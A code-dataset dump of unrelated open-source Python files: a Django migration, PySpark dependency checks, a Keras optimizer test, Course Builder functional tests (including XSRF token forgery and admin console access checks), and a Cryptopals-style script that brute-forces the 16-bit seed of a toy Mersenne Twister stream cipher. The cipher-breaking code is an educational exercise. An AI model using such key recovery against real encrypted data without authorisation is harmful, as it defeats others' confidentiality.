BASE_COMMAND.append('--nobackup')
if i_args.aggregate:
BASE_COMMAND.append('--aggregate')
config_schemas(i_args.cfg)
search_and_fix(i_args.subdir)
| piotr1212/whisper | contrib/update-storage-times.py | Python | apache-2.0 | 7,256 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('library', '0004_auto_20160825_1001'),
]
operations = [
migrations.AlterModelOptions(
name='car',
options={'ordering': ['name'], 'verbose_name': 'Car Setup'},
),
migrations.AddField(
model_name='car',
name='fixed_setup',
field=models.TextField(help_text=b'Store a fixed setup here if you wish; the contents can be copied from "Documents\\Assetto Corsa\\setups\\<car>\\<track>\\<setup-name>.ini", and pasted here. If you check the "fixed setup" option in your Preset\'s Entries - this fixed setup is applied', null=True, blank=True),
),
]
| PeteTheAutomator/ACServerManager | library/migrations/0005_auto_20160828_1046.py | Python | mit | 822 |
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
def require_minimum_pandas_version() -> None:
"""Raise ImportError if minimum version of Pandas is not installed"""
# TODO(HyukjinKwon): Relocate and deduplicate the version specification.
minimum_pandas_version = "1.0.5"
from distutils.version import LooseVersion
try:
import pandas
have_pandas = True
except ImportError as error:
have_pandas = False
raised_error = error
if not have_pandas:
raise ImportError(
"Pandas >= %s must be installed; however, " "it was not found." % minimum_pandas_version
) from raised_error
if LooseVersion(pandas.__version__) < LooseVersion(minimum_pandas_version):
raise ImportError(
"Pandas >= %s must be installed; however, "
"your version was %s." % (minimum_pandas_version, pandas.__version__)
)
def require_minimum_pyarrow_version() -> None:
"""Raise ImportError if minimum version of pyarrow is not installed"""
# TODO(HyukjinKwon): Relocate and deduplicate the version specification.
minimum_pyarrow_version = "1.0.0"
from distutils.version import LooseVersion
import os
try:
import pyarrow
have_arrow = True
except ImportError as error:
have_arrow = False
raised_error = error
if not have_arrow:
raise ImportError(
"PyArrow >= %s must be installed; however, "
"it was not found." % minimum_pyarrow_version
) from raised_error
if LooseVersion(pyarrow.__version__) < LooseVersion(minimum_pyarrow_version):
raise ImportError(
"PyArrow >= %s must be installed; however, "
"your version was %s." % (minimum_pyarrow_version, pyarrow.__version__)
)
if os.environ.get("ARROW_PRE_0_15_IPC_FORMAT", "0") == "1":
raise RuntimeError(
"Arrow legacy IPC format is not supported in PySpark, "
"please unset ARROW_PRE_0_15_IPC_FORMAT"
)
| ueshin/apache-spark | python/pyspark/sql/pandas/utils.py | Python | apache-2.0 | 2,779 |
from __future__ import print_function
import numpy as np
from keras_contrib.utils import test_utils
from keras import optimizers
from keras.models import Sequential
from keras.layers import Dense, Activation
from keras.utils import to_categorical
def get_test_data():
np.random.seed(1337)
(x_train, y_train), _ = test_utils.get_test_data(num_train=1000,
num_test=200,
input_shape=(10,),
classification=True,
num_classes=2)
y_train = to_categorical(y_train)
return x_train, y_train
def get_model(input_dim, num_hidden, output_dim):
model = Sequential()
model.add(Dense(num_hidden, input_shape=(input_dim,)))
model.add(Activation('relu'))
model.add(Dense(output_dim))
model.add(Activation('softmax'))
return model
def _test_optimizer(optimizer, target=0.75):
x_train, y_train = get_test_data()
model = get_model(x_train.shape[1], 10, y_train.shape[1])
model.compile(loss='categorical_crossentropy',
optimizer=optimizer,
metrics=['accuracy'])
history = model.fit(x_train, y_train, epochs=2, batch_size=16, verbose=0)
assert history.history['acc'][-1] >= target
config = optimizers.serialize(optimizer)
custom_objects = {optimizer.__class__.__name__: optimizer.__class__}
optim = optimizers.deserialize(config, custom_objects)
new_config = optimizers.serialize(optim)
assert config == new_config
| keras-team/keras-contrib | keras_contrib/tests/optimizers.py | Python | mit | 1,627 |
import math
import statistics
import challenge21 as mt
from util import xor, chunk
def mtcipherop(data, key):
assert key < 2**16
mt.seed(key)
out = bytearray()
for chk in chunk(data, 4):
keystream = mt.extract().to_bytes(4, 'little')
out += xor(chk, keystream[:len(chk)])
return out
def breakmtcipher(ciphertext):
lowestdev = 10000
guessed_plaintext = b''
for i in range(2**16):
print(i)
ptext = mtcipherop(ciphertext, i)
sdev = statistics.pstdev(ptext)
if sdev < lowestdev:
lowestdev = sdev
guessed_plaintext = ptext
print(lowestdev)
print(guessed_plaintext)
def main():
ciphertext = mtcipherop(b'Brown fox jumped over a log or something', 10)
breakmtcipher(ciphertext)
if __name__ == '__main__':
main()
| cngkaygusuz/matasano-challenges | challenge24.py | Python | mit | 847 |
# coding: utf-8
# Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests that walk through Course Builder pages."""
__author__ = 'Sean Lip'
import __builtin__
import copy
import cStringIO
import csv
import datetime
import logging
import os
import re
import shutil
import sys
import time
import urllib
import zipfile
import appengine_config
from controllers import lessons
from controllers import sites
from controllers import utils
from controllers.utils import XsrfTokenManager
from models import config
from models import courses
from models import jobs
from models import models
from models import transforms
from models import vfs
from models.courses import Course
import modules.admin.admin
from modules.announcements.announcements import AnnouncementEntity
import modules.oeditor.oeditor
from tools.etl import etl
from tools.etl import etl_lib
from tools.etl import examples
from tools.etl import remote
from webtest.app import AppError
import actions
from actions import assert_contains
from actions import assert_contains_all_of
from actions import assert_does_not_contain
from actions import assert_equals
from controllers_review import PeerReviewControllerTest
from controllers_review import PeerReviewDashboardTest
from review_stats import PeerReviewAnalyticsTest
from google.appengine.api import memcache
from google.appengine.api import namespace_manager
from google.appengine.ext import db
# A number of data files in a test course.
COURSE_FILE_COUNT = 70
# There is an expectation in our tests of automatic import of data/*.csv files,
# which is achieved below by selecting an alternative factory method.
courses.Course.create_new_default_course = (
courses.Course.custom_new_default_course_for_test)
class InfrastructureTest(actions.TestBase):
"""Test core infrastructure classes agnostic to specific user roles."""
def test_value_cached_in_one_namespace_invisible_in_another(self):
"""Value cached in one namespace is not visible in another."""
# set value and check it's visible in one namespace
old_namespace = namespace_manager.get_namespace()
try:
namespace_manager.set_namespace('test_memcache_manager_a')
models.MemcacheManager.set('foo', 'bar')
assert 'bar' == models.MemcacheManager.get('foo')
finally:
namespace_manager.set_namespace(old_namespace)
# check same value is not visible in another namespace
old_namespace = namespace_manager.get_namespace()
try:
namespace_manager.set_namespace('test_memcache_manager_b')
assert not models.MemcacheManager.get('foo')
finally:
namespace_manager.set_namespace(old_namespace)
# check same value is not visible in default namespace
assert not models.MemcacheManager.get('foo')
# check same value is not visible in None namespace
old_namespace = namespace_manager.get_namespace()
try:
namespace_manager.set_namespace(None)
assert not models.MemcacheManager.get('foo')
finally:
namespace_manager.set_namespace(old_namespace)
# set value and check it's visible in default namespace
models.MemcacheManager.set('foo', 'bar')
assert 'bar' == models.MemcacheManager.get('foo')
# check value is not visible in another namespace
old_namespace = namespace_manager.get_namespace()
try:
namespace_manager.set_namespace('test_memcache_manager_c')
assert not models.MemcacheManager.get('foo')
finally:
namespace_manager.set_namespace(old_namespace)
def test_response_content_type_is_application_json_in_utf_8(self):
response = self.testapp.get(
'/rest/config/item?key=gcb_config_update_interval_sec')
self.assertEqual(
'application/javascript; charset=utf-8',
response.headers['Content-Type'])
def test_xsrf_token_manager(self):
"""Test XSRF token operations."""
# os.environ['AUTH_DOMAIN'] = 'test_domain'
# os.environ['APPLICATION_ID'] = 'test app'
# Issues and verify anonymous user token.
action = 'test-action'
token = utils.XsrfTokenManager.create_xsrf_token(action)
assert '/' in token
assert utils.XsrfTokenManager.is_xsrf_token_valid(token, action)
# Impersonate real user.
os.environ['USER_EMAIL'] = 'test_email'
os.environ['USER_ID'] = 'test_id'
# Issues and verify real user token.
action = 'test-action'
token = utils.XsrfTokenManager.create_xsrf_token(action)
assert '/' in token
assert utils.XsrfTokenManager.is_xsrf_token_valid(token, action)
# Check forged time stamp invalidates token.
parts = token.split('/')
assert len(parts) == 2
forgery = '%s/%s' % (long(parts[0]) + 1000, parts[1])
assert forgery != token
assert not utils.XsrfTokenManager.is_xsrf_token_valid(forgery, action)
# Check token properly expires.
action = 'test-action'
time_in_the_past = long(
time.time() - utils.XsrfTokenManager.XSRF_TOKEN_AGE_SECS)
# pylint: disable-msg=protected-access
old_token = utils.XsrfTokenManager._create_token(
action, time_in_the_past)
assert not utils.XsrfTokenManager.is_xsrf_token_valid(old_token, action)
# Clean up.
# del os.environ['APPLICATION_ID']
# del os.environ['AUTH_DOMAIN']
del os.environ['USER_EMAIL']
del os.environ['USER_ID']
def test_import_course(self):
"""Tests importing one course into another."""
# Setup courses.
sites.setup_courses('course:/a::ns_a, course:/b::ns_b, course:/:/')
# Validate the courses before import.
all_courses = sites.get_all_courses()
dst_app_context_a = all_courses[0]
dst_app_context_b = all_courses[1]
src_app_context = all_courses[2]
dst_course_a = courses.Course(None, app_context=dst_app_context_a)
dst_course_b = courses.Course(None, app_context=dst_app_context_b)
src_course = courses.Course(None, app_context=src_app_context)
assert not dst_course_a.get_units()
assert not dst_course_b.get_units()
assert 12 == len(src_course.get_units())
# Import 1.2 course into 1.3.
errors = []
src_course_out, dst_course_out_a = dst_course_a.import_from(
src_app_context, errors)
if errors:
raise Exception(errors)
assert len(
src_course.get_units()) == len(src_course_out.get_units())
assert len(
src_course_out.get_units()) == len(dst_course_out_a.get_units())
# Import 1.3 course into 1.3.
errors = []
src_course_out_a, dst_course_out_b = dst_course_b.import_from(
dst_app_context_a, errors)
if errors:
raise Exception(errors)
assert src_course_out_a.get_units() == dst_course_out_b.get_units()
# Test delete.
units_to_delete = dst_course_a.get_units()
deleted_count = 0
for unit in units_to_delete:
assert dst_course_a.delete_unit(unit)
deleted_count += 1
dst_course_a.save()
assert deleted_count == len(units_to_delete)
assert not dst_course_a.get_units()
assert not dst_course_a.app_context.fs.list(os.path.join(
dst_course_a.app_context.get_home(), 'assets/js/'))
# Clean up.
sites.reset_courses()
def test_create_new_course(self):
"""Tests creating a new course."""
# Setup courses.
sites.setup_courses('course:/test::ns_test, course:/:/')
# Add several units.
course = courses.Course(None, app_context=sites.get_all_courses()[0])
link = course.add_link()
unit = course.add_unit()
assessment = course.add_assessment()
course.save()
assert course.find_unit_by_id(link.unit_id)
assert course.find_unit_by_id(unit.unit_id)
assert course.find_unit_by_id(assessment.unit_id)
assert 3 == len(course.get_units())
assert assessment.unit_id == 3
# Check unit can be found.
assert unit == course.find_unit_by_id(unit.unit_id)
assert not course.find_unit_by_id(999)
# Update unit.
unit.title = 'Test Title'
course.update_unit(unit)
course.save()
assert 'Test Title' == course.find_unit_by_id(unit.unit_id).title
# Update assessment.
assessment_content = open(os.path.join(
appengine_config.BUNDLE_ROOT,
'assets/js/assessment-Pre.js'), 'rb').readlines()
assessment_content = u''.join(assessment_content)
errors = []
course.set_assessment_content(assessment, assessment_content, errors)
course.save()
assert not errors
assessment_content_stored = course.app_context.fs.get(os.path.join(
course.app_context.get_home(),
course.get_assessment_filename(assessment.unit_id)))
assert assessment_content == assessment_content_stored
# Test adding lessons.
lesson_a = course.add_lesson(unit)
lesson_b = course.add_lesson(unit)
lesson_c = course.add_lesson(unit)
course.save()
assert [lesson_a, lesson_b, lesson_c] == course.get_lessons(
unit.unit_id)
assert lesson_c.lesson_id == 6
# Reorder lessons.
new_order = [
{'id': link.unit_id},
{
'id': unit.unit_id,
'lessons': [
{'id': lesson_b.lesson_id},
{'id': lesson_a.lesson_id},
{'id': lesson_c.lesson_id}]},
{'id': assessment.unit_id}]
course.reorder_units(new_order)
course.save()
assert [lesson_b, lesson_a, lesson_c] == course.get_lessons(
unit.unit_id)
# Move lesson to another unit.
another_unit = course.add_unit()
course.move_lesson_to(lesson_b, another_unit)
course.save()
assert [lesson_a, lesson_c] == course.get_lessons(unit.unit_id)
assert [lesson_b] == course.get_lessons(another_unit.unit_id)
course.delete_unit(another_unit)
course.save()
# Make the course available.
get_environ_old = sites.ApplicationContext.get_environ
def get_environ_new(self):
environ = get_environ_old(self)
environ['course']['now_available'] = True
return environ
sites.ApplicationContext.get_environ = get_environ_new
# Test public/private assessment.
assessment_url = (
'/test/' + course.get_assessment_filename(assessment.unit_id))
assert not assessment.now_available
response = self.get(assessment_url, expect_errors=True)
assert_equals(response.status_int, 403)
assessment = course.find_unit_by_id(assessment.unit_id)
assessment.now_available = True
course.update_unit(assessment)
course.save()
response = self.get(assessment_url)
assert_equals(response.status_int, 200)
# Check delayed assessment deletion.
course.delete_unit(assessment)
response = self.get(assessment_url) # note: file is still available
assert_equals(response.status_int, 200)
course.save()
response = self.get(assessment_url, expect_errors=True)
assert_equals(response.status_int, 404)
# Test public/private activity.
lesson_a = course.find_lesson_by_id(None, lesson_a.lesson_id)
lesson_a.now_available = False
lesson_a.has_activity = True
course.update_lesson(lesson_a)
errors = []
course.set_activity_content(lesson_a, u'var activity = []', errors)
assert not errors
activity_url = (
'/test/' + course.get_activity_filename(None, lesson_a.lesson_id))
response = self.get(activity_url, expect_errors=True)
assert_equals(response.status_int, 403)
lesson_a = course.find_lesson_by_id(None, lesson_a.lesson_id)
lesson_a.now_available = True
course.update_lesson(lesson_a)
course.save()
response = self.get(activity_url)
assert_equals(response.status_int, 200)
# Check delayed activity.
course.delete_lesson(lesson_a)
response = self.get(activity_url) # note: file is still available
assert_equals(response.status_int, 200)
course.save()
response = self.get(activity_url, expect_errors=True)
assert_equals(response.status_int, 404)
# Test deletes removes all child objects.
course.delete_unit(link)
course.delete_unit(unit)
assert not course.delete_unit(assessment)
course.save()
assert not course.get_units()
assert not course.app_context.fs.list(os.path.join(
course.app_context.get_home(), 'assets/js/'))
# Clean up.
sites.ApplicationContext.get_environ = get_environ_old
sites.reset_courses()
def test_unit_lesson_not_available(self):
"""Tests that unavailable units and lessons behave correctly."""
# Setup a new course.
sites.setup_courses('course:/test::ns_test, course:/:/')
self.base = '/test'
config.Registry.test_overrides[models.CAN_USE_MEMCACHE.name] = True
app_context = sites.get_all_courses()[0]
course = courses.Course(None, app_context=app_context)
# Add a unit that is not available.
unit_1 = course.add_unit()
unit_1.now_available = False
lesson_1_1 = course.add_lesson(unit_1)
lesson_1_1.title = 'Lesson 1.1'
course.update_unit(unit_1)
# Add a unit with some lessons available and some lessons not available.
unit_2 = course.add_unit()
unit_2.now_available = True
lesson_2_1 = course.add_lesson(unit_2)
lesson_2_1.title = 'Lesson 2.1'
lesson_2_1.now_available = False
lesson_2_2 = course.add_lesson(unit_2)
lesson_2_2.title = 'Lesson 2.2'
lesson_2_2.now_available = True
course.update_unit(unit_2)
# Add a unit with all lessons not available.
unit_3 = course.add_unit()
unit_3.now_available = True
lesson_3_1 = course.add_lesson(unit_3)
lesson_3_1.title = 'Lesson 3.1'
lesson_3_1.now_available = False
course.update_unit(unit_3)
# Add a unit that is available.
unit_4 = course.add_unit()
unit_4.now_available = True
lesson_4_1 = course.add_lesson(unit_4)
lesson_4_1.title = 'Lesson 4.1'
lesson_4_1.now_available = True
course.update_unit(unit_4)
# Add an available unit with no lessons.
unit_5 = course.add_unit()
unit_5.now_available = True
course.update_unit(unit_5)
course.save()
assert [lesson_1_1] == course.get_lessons(unit_1.unit_id)
assert [lesson_2_1, lesson_2_2] == course.get_lessons(unit_2.unit_id)
assert [lesson_3_1] == course.get_lessons(unit_3.unit_id)
# Make the course available.
get_environ_old = sites.ApplicationContext.get_environ
def get_environ_new(self):
environ = get_environ_old(self)
environ['course']['now_available'] = True
return environ
sites.ApplicationContext.get_environ = get_environ_new
private_tag = 'id="lesson-title-private"'
# Simulate a student traversing the course.
email = 'test_unit_lesson_not_available@example.com'
name = 'Test Unit Lesson Not Available'
actions.login(email, is_admin=False)
actions.register(self, name)
# Accessing a unit that is not available redirects to the main page.
response = self.get('unit?unit=%s' % unit_1.unit_id)
assert_equals(response.status_int, 302)
response = self.get('unit?unit=%s' % unit_2.unit_id)
assert_equals(response.status_int, 200)
assert_contains('Lesson 2.1', response.body)
assert_contains('This lesson is not available.', response.body)
assert_does_not_contain(private_tag, response.body)
response = self.get('unit?unit=%s&lesson=%s' % (
unit_2.unit_id, lesson_2_2.lesson_id))
assert_equals(response.status_int, 200)
assert_contains('Lesson 2.2', response.body)
assert_does_not_contain('This lesson is not available.', response.body)
assert_does_not_contain(private_tag, response.body)
response = self.get('unit?unit=%s' % unit_3.unit_id)
assert_equals(response.status_int, 200)
assert_contains('Lesson 3.1', response.body)
assert_contains('This lesson is not available.', response.body)
assert_does_not_contain(private_tag, response.body)
response = self.get('unit?unit=%s' % unit_4.unit_id)
assert_equals(response.status_int, 200)
assert_contains('Lesson 4.1', response.body)
assert_does_not_contain('This lesson is not available.', response.body)
assert_does_not_contain(private_tag, response.body)
response = self.get('unit?unit=%s' % unit_5.unit_id)
assert_equals(response.status_int, 200)
assert_does_not_contain('Lesson', response.body)
assert_contains(
'This unit does not contain any lessons.', response.body)
assert_does_not_contain(private_tag, response.body)
actions.logout()
# Simulate an admin traversing the course.
email = 'test_unit_lesson_not_available@example.com_admin'
name = 'Test Unit Lesson Not Available Admin'
actions.login(email, is_admin=True)
actions.register(self, name)
# The course admin can access a unit that is not available.
response = self.get('unit?unit=%s' % unit_1.unit_id)
assert_equals(response.status_int, 200)
assert_contains('Lesson 1.1', response.body)
response = self.get('unit?unit=%s' % unit_2.unit_id)
assert_equals(response.status_int, 200)
assert_contains('Lesson 2.1', response.body)
assert_does_not_contain('This lesson is not available.', response.body)
assert_contains(private_tag, response.body)
response = self.get('unit?unit=%s&lesson=%s' % (
unit_2.unit_id, lesson_2_2.lesson_id))
assert_equals(response.status_int, 200)
assert_contains('Lesson 2.2', response.body)
assert_does_not_contain('This lesson is not available.', response.body)
assert_does_not_contain(private_tag, response.body)
response = self.get('unit?unit=%s' % unit_3.unit_id)
assert_equals(response.status_int, 200)
assert_contains('Lesson 3.1', response.body)
assert_does_not_contain('This lesson is not available.', response.body)
assert_contains(private_tag, response.body)
response = self.get('unit?unit=%s' % unit_4.unit_id)
assert_equals(response.status_int, 200)
assert_contains('Lesson 4.1', response.body)
assert_does_not_contain('This lesson is not available.', response.body)
assert_does_not_contain(private_tag, response.body)
response = self.get('unit?unit=%s' % unit_5.unit_id)
assert_equals(response.status_int, 200)
assert_does_not_contain('Lesson', response.body)
assert_contains(
'This unit does not contain any lessons.', response.body)
assert_does_not_contain(private_tag, response.body)
actions.logout()
# Clean up app_context.
sites.ApplicationContext.get_environ = get_environ_old
def test_custom_assessments(self):
"""Tests that custom assessments are evaluated correctly."""
# Setup a new course.
sites.setup_courses('course:/test::ns_test, course:/:/')
self.base = '/test'
self.namespace = 'ns_test'
config.Registry.test_overrides[models.CAN_USE_MEMCACHE.name] = True
app_context = sites.get_all_courses()[0]
course = courses.Course(None, app_context=app_context)
email = 'test_assessments@google.com'
name = 'Test Assessments'
assessment_1 = course.add_assessment()
assessment_1.title = 'first'
assessment_1.now_available = True
assessment_1.weight = 0
assessment_2 = course.add_assessment()
assessment_2.title = 'second'
assessment_2.now_available = True
assessment_2.weight = 0
course.save()
assert course.find_unit_by_id(assessment_1.unit_id)
assert course.find_unit_by_id(assessment_2.unit_id)
assert 2 == len(course.get_units())
# Make the course available.
get_environ_old = sites.ApplicationContext.get_environ
def get_environ_new(self):
environ = get_environ_old(self)
environ['course']['now_available'] = True
return environ
sites.ApplicationContext.get_environ = get_environ_new
first = {'score': '1.00', 'assessment_type': assessment_1.unit_id}
second = {'score': '3.00', 'assessment_type': assessment_2.unit_id}
# Update assessment 1.
assessment_1_content = open(os.path.join(
appengine_config.BUNDLE_ROOT,
'assets/js/assessment-Pre.js'), 'rb').readlines()
assessment_1_content = u''.join(assessment_1_content)
errors = []
course.set_assessment_content(
assessment_1, assessment_1_content, errors)
course.save()
assert not errors
# Update assessment 2.
assessment_2_content = open(os.path.join(
appengine_config.BUNDLE_ROOT,
'assets/js/assessment-Mid.js'), 'rb').readlines()
assessment_2_content = u''.join(assessment_2_content)
errors = []
course.set_assessment_content(
assessment_2, assessment_2_content, errors)
course.save()
assert not errors
# Register.
actions.login(email)
actions.register(self, name)
# Submit assessment 1.
actions.submit_assessment(self, assessment_1.unit_id, first)
student = models.StudentProfileDAO.get_enrolled_student_by_email_for(
email, app_context)
student_scores = course.get_all_scores(student)
assert len(student_scores) == 2
assert student_scores[0]['id'] == str(assessment_1.unit_id)
assert student_scores[0]['score'] == 1
assert student_scores[0]['title'] == 'first'
assert student_scores[0]['weight'] == 0
assert student_scores[1]['id'] == str(assessment_2.unit_id)
assert student_scores[1]['score'] == 0
assert student_scores[1]['title'] == 'second'
assert student_scores[1]['weight'] == 0
# The overall score is None if there are no weights assigned to any of
# the assessments.
overall_score = course.get_overall_score(student)
assert overall_score is None
# View the student profile page.
response = self.get('student/home')
assert_does_not_contain('Overall course score', response.body)
# Add a weight to the first assessment.
assessment_1.weight = 10
overall_score = course.get_overall_score(student)
assert overall_score == 1
# Submit assessment 2.
actions.submit_assessment(self, assessment_2.unit_id, second)
# We need to reload the student instance, because its properties have
# changed.
student = models.StudentProfileDAO.get_enrolled_student_by_email_for(
email, app_context)
student_scores = course.get_all_scores(student)
assert len(student_scores) == 2
assert student_scores[1]['score'] == 3
overall_score = course.get_overall_score(student)
assert overall_score == 1
# Change the weight of assessment 2.
assessment_2.weight = 30
overall_score = course.get_overall_score(student)
assert overall_score == int((1 * 10 + 3 * 30) / 40)
# Save all changes.
course.save()
# View the student profile page.
response = self.get('student/home')
assert_contains('assessment-score-first">1</span>', response.body)
assert_contains('assessment-score-second">3</span>', response.body)
assert_contains('Overall course score', response.body)
assert_contains('assessment-score-overall">2</span>', response.body)
# Submitting a lower score for any assessment does not change any of
# the scores, since the system records the maximum score that has ever
# been achieved on any assessment.
first_retry = {'score': '0', 'assessment_type': assessment_1.unit_id}
actions.submit_assessment(self, assessment_1.unit_id, first_retry)
student = models.StudentProfileDAO.get_enrolled_student_by_email_for(
email, app_context)
student_scores = course.get_all_scores(student)
assert len(student_scores) == 2
assert student_scores[0]['id'] == str(assessment_1.unit_id)
assert student_scores[0]['score'] == 1
overall_score = course.get_overall_score(student)
assert overall_score == int((1 * 10 + 3 * 30) / 40)
actions.logout()
# Clean up app_context.
sites.ApplicationContext.get_environ = get_environ_old
def test_datastore_backed_file_system(self):
"""Tests datastore-backed file system operations."""
fs = vfs.AbstractFileSystem(vfs.DatastoreBackedFileSystem('', '/'))
# Check binary file.
src = os.path.join(appengine_config.BUNDLE_ROOT, 'course.yaml')
dst = os.path.join('/', 'course.yaml')
fs.put(dst, open(src, 'rb'))
stored = fs.open(dst)
assert stored.metadata.size == len(open(src, 'rb').read())
assert not stored.metadata.is_draft
assert stored.read() == open(src, 'rb').read()
# Check draft.
fs.put(dst, open(src, 'rb'), is_draft=True)
stored = fs.open(dst)
assert stored.metadata.is_draft
# Check text files with non-ASCII characters and encoding.
foo_js = os.path.join('/', 'assets/js/foo.js')
foo_text = u'This is a test text (тест данные).'
fs.put(foo_js, vfs.string_to_stream(foo_text))
stored = fs.open(foo_js)
assert vfs.stream_to_string(stored) == foo_text
# Check delete.
del_file = os.path.join('/', 'memcache.test')
fs.put(del_file, vfs.string_to_stream(u'test'))
assert fs.isfile(del_file)
fs.delete(del_file)
assert not fs.isfile(del_file)
# Check open or delete of non-existent does not fail.
assert not fs.open('/foo/bar/baz')
assert not fs.delete('/foo/bar/baz')
# Check new content fully overrides old (with and without memcache).
test_file = os.path.join('/', 'memcache.test')
fs.put(test_file, vfs.string_to_stream(u'test text'))
stored = fs.open(test_file)
assert u'test text' == vfs.stream_to_string(stored)
fs.delete(test_file)
# Check file existence.
assert not fs.isfile('/foo/bar')
assert fs.isfile('/course.yaml')
assert fs.isfile('/assets/js/foo.js')
# Check file listing.
bar_js = os.path.join('/', 'assets/js/bar.js')
fs.put(bar_js, vfs.string_to_stream(foo_text))
baz_js = os.path.join('/', 'assets/js/baz.js')
fs.put(baz_js, vfs.string_to_stream(foo_text))
assert fs.list('/') == sorted([
u'/course.yaml',
u'/assets/js/foo.js', u'/assets/js/bar.js', u'/assets/js/baz.js'])
assert fs.list('/assets') == sorted([
u'/assets/js/foo.js', u'/assets/js/bar.js', u'/assets/js/baz.js'])
assert not fs.list('/foo/bar')
def test_utf8_datastore(self):
"""Test writing to and reading from datastore using UTF-8 content."""
event = models.EventEntity()
event.source = 'test-source'
event.user_id = 'test-user-id'
event.data = u'Test Data (тест данные)'
event.put()
stored_event = models.EventEntity().get_by_id([event.key().id()])
assert 1 == len(stored_event)
assert event.data == stored_event[0].data
def assert_queriable(self, entity, name, date_type=datetime.datetime):
"""Create some entities and check that single-property queries work."""
for i in range(1, 32):
item = entity(
key_name='%s_%s' % (date_type.__class__.__name__, i))
setattr(item, name, date_type(2012, 1, i))
item.put()
# Descending order.
items = entity.all().order('-%s' % name).fetch(1000)
assert len(items) == 31
assert getattr(items[0], name) == date_type(2012, 1, 31)
# Ascending order.
items = entity.all().order('%s' % name).fetch(1000)
assert len(items) == 31
assert getattr(items[0], name) == date_type(2012, 1, 1)
def test_indexed_properties(self):
"""Test whether entities support specific query types."""
# A 'DateProperty' or 'DateTimeProperty' of each persistent entity must
# be indexed. This is true even if the application doesn't execute any
# queries relying on the index. The index is still critically important
# for managing data, for example, for bulk data download or for
# incremental computations. Using index, the entire table can be
# processed in daily, weekly, etc. chunks and it is easy to query for
# new data. If we did not have an index, chunking would have to be done
# by the primary index, where it is impossible to separate recently
# added/modified rows from the rest of the data. Having this index adds
# to the cost of datastore writes, but we believe it is important to
# have it. Below we check that all persistent date/datetime properties
# are indexed.
self.assert_queriable(
AnnouncementEntity, 'date', date_type=datetime.date)
self.assert_queriable(models.EventEntity, 'recorded_on')
self.assert_queriable(models.Student, 'enrolled_on')
self.assert_queriable(models.StudentAnswersEntity, 'updated_on')
self.assert_queriable(jobs.DurableJobEntity, 'updated_on')
def test_config_visible_from_any_namespace(self):
"""Test that ConfigProperty is visible from any namespace."""
assert (
config.UPDATE_INTERVAL_SEC.value ==
config.UPDATE_INTERVAL_SEC.default_value)
new_value = config.UPDATE_INTERVAL_SEC.default_value + 5
# Add datastore override for known property.
prop = config.ConfigPropertyEntity(
key_name=config.UPDATE_INTERVAL_SEC.name)
prop.value = str(new_value)
prop.is_draft = False
prop.put()
# Check visible from default namespace.
config.Registry.last_update_time = 0
assert config.UPDATE_INTERVAL_SEC.value == new_value
# Check visible from another namespace.
old_namespace = namespace_manager.get_namespace()
try:
namespace_manager.set_namespace(
'ns-test_config_visible_from_any_namespace')
config.Registry.last_update_time = 0
assert config.UPDATE_INTERVAL_SEC.value == new_value
finally:
namespace_manager.set_namespace(old_namespace)
class AdminAspectTest(actions.TestBase):
"""Test site from the Admin perspective."""
def test_courses_page_for_multiple_courses(self):
"""Tests /admin page showing multiple courses."""
# Setup courses.
sites.setup_courses('course:/aaa::ns_a, course:/bbb::ns_b, course:/:/')
config.Registry.test_overrides[
models.CAN_USE_MEMCACHE.name] = True
# Validate the courses before import.
all_courses = sites.get_all_courses()
dst_app_context_a = all_courses[0]
dst_app_context_b = all_courses[1]
src_app_context = all_courses[2]
# This test requires a read-write file system. If test runs on read-
# only one, we can't run this test :(
if (not dst_app_context_a.fs.is_read_write() or
not dst_app_context_a.fs.is_read_write()):
return
course_a = courses.Course(None, app_context=dst_app_context_a)
course_b = courses.Course(None, app_context=dst_app_context_b)
unused_course, course_a = course_a.import_from(src_app_context)
unused_course, course_b = course_b.import_from(src_app_context)
# Rename courses.
dst_app_context_a.fs.put(
dst_app_context_a.get_config_filename(),
vfs.string_to_stream(u'course:\n title: \'Course AAA\''))
dst_app_context_b.fs.put(
dst_app_context_b.get_config_filename(),
vfs.string_to_stream(u'course:\n title: \'Course BBB\''))
# Login.
email = 'test_courses_page_for_multiple_courses@google.com'
actions.login(email, is_admin=True)
# Check the course listing page.
response = self.testapp.get('/admin')
assert_contains_all_of([
'Course AAA',
'/aaa/dashboard',
'Course BBB',
'/bbb/dashboard'], response.body)
# Clean up.
sites.reset_courses()
def test_python_console(self):
"""Test access rights to the Python console."""
email = 'test_python_console@google.com'
# The default is that the console should be turned off
self.assertFalse(modules.admin.admin.DIRECT_CODE_EXECUTION_UI_ENABLED)
# Test the console when it is enabled
modules.admin.admin.DIRECT_CODE_EXECUTION_UI_ENABLED = True
# Check normal user has no access.
actions.login(email)
response = self.testapp.get('/admin?action=console')
assert_equals(response.status_int, 302)
response = self.testapp.post('/admin?action=console')
assert_equals(response.status_int, 302)
# Check delegated admin has no access.
os.environ['gcb_admin_user_emails'] = '[%s]' % email
actions.login(email)
response = self.testapp.get('/admin?action=console')
assert_equals(response.status_int, 200)
assert_contains(
'You must be an actual admin user to continue.', response.body)
response = self.testapp.get('/admin?action=console')
assert_equals(response.status_int, 200)
assert_contains(
'You must be an actual admin user to continue.', response.body)
del os.environ['gcb_admin_user_emails']
# Check actual admin has access.
actions.login(email, is_admin=True)
response = self.testapp.get('/admin?action=console')
assert_equals(response.status_int, 200)
response.form.set('code', 'print "foo" + "bar"')
response = self.submit(response.form)
assert_contains('foobar', response.body)
# Finally, test that the console is not found when it is disabled
